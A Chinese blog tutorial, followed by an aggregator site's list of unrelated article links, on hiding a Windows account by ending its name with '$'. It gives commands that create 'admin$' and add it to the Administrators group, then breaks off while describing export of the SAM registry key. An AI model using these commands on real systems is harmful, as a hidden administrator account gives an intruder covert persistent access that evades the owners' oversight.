当前位置:网站首页>隐藏用户的创建和使用
隐藏用户的创建和使用
2022-07-01 21:47:00 【千里ZLP】
1. 隐藏账户创建
在 windows 环境下创建用户如果后面带了一个"$"符号,在 net user 时默认是不显示的,下文基于这个特性展开
新建一个隐藏账户并加入管理员组 (需要管理员权限)
net user admin$ admin /add #用户名要以$结尾
net localgroup administrators admin$ /add

如上图,查看用户时看不到新建的admin$用户。
但是在控制面板的管理工具中的用户与用户组,仍可以查看到该用户的存在

2.导出注册表
在注册表"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names&
边栏推荐
- Yyds dry goods inventory # solve the real problem of famous enterprises: egg twisting machine
- 互联网的智算架构设计
- Why must digital transformation strategies include continuous testing?
- 删除AWS绑定的信用卡账户
- Copy ‘XXXX‘ to effectively final temp variable
- Recent public ancestor (LCA) online practices
- [monomer] recommended configuration of streaming information i-bpsv3 server
- 【JetCache】JetCache的使用方法与步骤
- 详解Kubernetes网络模型
- 牛客月赛-分组求对数和
猜你喜欢

Dark horse programmer - software testing - stage 06 2-linux and database-01-08 Chapter 1 - description of the content of the Linux operating system stage, description of the basic format and common fo

EasyExcel 复杂数据导出

【JetCache】JetCache的使用方法与步骤

详解ThreadLocal

13th Blue Bridge Cup group B national tournament

PyTorch磨刀篇|argmax和argmin函数

业务可视化-让你的流程图'Run'起来

MySQL learning notes - SQL optimization of optimization

【juc学习之路第9天】屏障衍生工具

配置筛选机
随机推荐
MySQL learning notes - SQL optimization of optimization
Clean up system cache and free memory under Linux
#yyds干货盘点# 解决名企真题:扭蛋机
【目标跟踪】|单目标跟踪指标
AirServer2022最新版功能介绍及下载
Airserver mobile phone third-party screen projection computer software
GenICam GenTL 标准 ver1.5(4)第五章 采集引擎
Separate the letters and numbers in the string so that the letters come first and the array comes last
Gaussdb (DWS) active prevention and troubleshooting
多种智能指针
记录一次spark on yarn 任务报错 Operation category READ is not supported in state standby
Dark horse programmer - software testing - stage 06 2-linux and database-01-08 Chapter 1 - description of the content of the Linux operating system stage, description of the basic format and common fo
Aidl basic use
Which securities company should we choose to open an account for flush stock? Is it safe to open an account with a mobile phone?
QT uses ffmpeg4 to convert the qimage of ARGB to yuv422p
Object memory layout
Internet of things RFID, etc
Unity uses SQLite
PHP reflective XSS, reflective XSS test and repair
比较版本号[双指针截取自己想要的字串]